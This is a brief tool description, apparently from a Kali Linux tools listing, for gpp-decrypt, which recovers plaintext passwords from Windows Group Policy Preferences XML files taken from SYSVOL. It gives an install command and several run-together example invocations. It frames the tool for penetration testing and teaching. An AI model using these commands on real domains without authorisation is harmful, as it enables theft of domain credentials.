GPP-Decrypt
A simple Ruby script that decrypts Group Policy Preferences (GPP) encrypted strings. It recovers passwords from GPP XML files found in Windows environments.
Description
gpp-decrypt is designed to decrypt encrypted strings from Group Policy Preferences, which were used in Windows to store passwords in XML files. These files often contained cleartext passwords after decryption, making them a valuable target in penetration testing and red team operations. The tool addresses a specific weakness in older Windows Group Policy configurations where passwords were not properly protected.
Use cases include post-exploitation scenarios where attackers obtain GPP files from domain controllers or SYSVOL shares. Security professionals use it to demonstrate risks associated with default GPP password storage, highlighting the need for proper configurations and monitoring. It serves as an educational tool for understanding legacy Windows security flaws.
The script is lightweight and relies on Ruby, making it easy to deploy in Kali Linux environments for quick password recovery during assessments.
How It Works
The tool implements the decryption algorithm used by Windows for Group Policy Preferences passwords. It takes a base64-encoded GPP string, applies the known AES decryption key and IV hardcoded in the script (derived from Microsoft documentation), and outputs the plaintext password. This exploits the static crypto material exposed by Microsoft in 2012.
Installation
sudo apt install gpp-decryptExamples
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhwgpp-decrypt [base64-encoded-gpp-string]echo 'j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw' | gpp-decryptgpp-decrypt [password-from-sysvol-gpp-xml]gpp-decrypt cGFzc3dvcmQ=root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw